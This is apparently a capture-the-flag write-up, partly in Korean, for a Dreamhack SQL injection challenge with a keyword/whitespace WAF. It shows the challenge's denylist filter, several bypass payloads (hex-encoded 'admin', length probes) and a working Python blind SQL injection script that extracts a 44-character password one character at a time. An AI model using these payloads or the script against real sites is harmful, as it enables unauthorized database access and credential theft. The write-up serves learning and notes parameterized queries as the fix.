sql injection bypass WAF advanced

# Denylist consulted by check_WAF. Entries are matched as plain substrings of
# the lower-cased input, so this is a keyword/character filter, not a parser.
# NOTE(review): the list has no entry for quote, pipe, hash, semicolon or
# parenthesis characters. A denylist like this is defence in depth at best;
# the query itself should be built with bound parameters.
keywords = [
    # SQL keywords and boolean operators
    'union',
    'select',
    'from',
    'and',
    'or',
    # literal account name
    'admin',
    # space, plus the two characters that form a /**/ comment
    ' ',
    '*',
    '/',
    # remaining ASCII whitespace: LF, CR, TAB, VT, FF
    '\n',
    '\r',
    '\t',
    '\x0b',
    '\x0c',
    # arithmetic signs ('-' is also the first character of a -- comment)
    '-',
    '+',
]
def check_WAF(data):
    """Report whether ``data`` contains any entry of the ``keywords`` denylist.

    The input is lower-cased once and every denylist entry is looked up as a
    plain substring, so matching is case-insensitive for the alphabetic
    entries. No decoding or normalisation happens here; the function inspects
    exactly the value it is handed.

    NOTE(review): a substring denylist only rejects what it lists. It does
    not replace parameterized queries in the code that builds the SQL.

    Args:
        data: value to screen; must provide ``lower()``.

    Returns:
        True if at least one denylist entry occurs in the input, else False.
    """
    lowered = data.lower()
    return any(keyword in lowered for keyword in keywords)

방화벽 키워드
?uid=’ || uid=0x61646d696e0a
여기서 공백을 우회해줘야 하는데…
%a0?
?uid=’%a0||%a0uid=0x61646d696e0a
이건 아예 서버 나감

char(0x2f,0x2a,0x2a,0x2f)
?uid=’chr(0x2f,0x2a,0x2a,0x2f)||chr(0x2f,0x2a,0x2a,0x2f)uid=0x61646d696e0a
얘도 서버 나감

?uid=’   length(upw)>10;#’

Image 1

Image 2

upw길이 44

import requests
import string
import sys
from urllib.parse import urljoin
from urllib import parse 
from requests import get

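# Lab target as given by the author (a wargame instance, judging by the
# hostname).
host = 'http://host3.dreamhack.games:23172/'

password_length = 44  # length of upw, measured beforehand with length(upw)
password = ""  # recovered value (the flag)
# %27 is a URL-encoded single quote placed at the start of the uid value.
url = host + '?uid=%27||'
char = string.digits + string.ascii_letters

# One GET per (position, candidate) pair: up to password_length * len(char)
# requests, each carrying ascii(mid(...)) in the query string. From the
# defender's side this is a loud pattern that is easy to alert on in access
# logs.
for i in range(1, password_length + 1):  # was a hard-coded 45
    for j in char:
        # Boolean test on one character of upw. %23 is a URL-encoded '#',
        # presumably there to comment out the rest of the statement.
        param = "ascii(mid(upw," + str(i) + ",1))=" + str(ord(j)) + ";%23"
        URL = url + param
        # A timeout keeps one stalled response from hanging the whole run.
        response = requests.get(URL, timeout=10)
        # Membership test: find(...) > 0 would miss a match at index 0.
        if "admin" in response.text:
            print(j)
            password += j
            break
    else:
        # The candidate set is digits and letters only. Record the gap so
        # later characters stay at their true positions.
        print(f"no match at position {i}", file=sys.stderr)
        password += "?"

print(password)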

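저번 파이썬 코드랑 똑같음
왜 advanced인 거지..? 필터가 키워드·공백 위주의 차단 목록(denylist)이라, 이 스크립트가 쓰는 따옴표, ||, 함수 호출, ;, #은 목록에 없어서 그대로 통과함. 근본 대책은 차단 목록을 늘리는 게 아니라 파라미터 바인딩(prepared statement)을 쓰는 것.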